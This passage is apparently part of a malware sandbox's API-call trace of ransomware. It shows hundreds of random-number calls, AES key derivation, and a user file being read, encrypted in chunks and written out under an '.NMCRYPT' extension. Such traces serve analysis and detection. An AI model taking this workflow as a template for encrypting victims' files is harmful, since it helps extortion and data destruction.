dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.411] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.412] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.413] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.413] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.413] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0149.413] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.413] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad4f8) returned 1 [0149.413] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0149.413] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0149.414] wcslen (_String="\\\\?\\") returned 0x4 [0149.414] CryptDuplicateKey (in: hKey=0x9ad4f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad338) returned 1 [0149.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0149.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0149.415] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=180172) returned 1 [0149.416] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0149.416] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.426] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.426] GetLastError () returned 0x0 [0149.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.615] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.615] GetLastError () returned 0x0 [0149.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.615] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.615] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.615] GetLastError () returned 0x0 [0149.615] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.616] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.616] GetLastError () returned 0x0 [0149.616] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.616] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.617] GetLastError () returned 0x0 [0149.617] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.617] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.617] CryptEncrypt (in: hKey=0x9ad338, 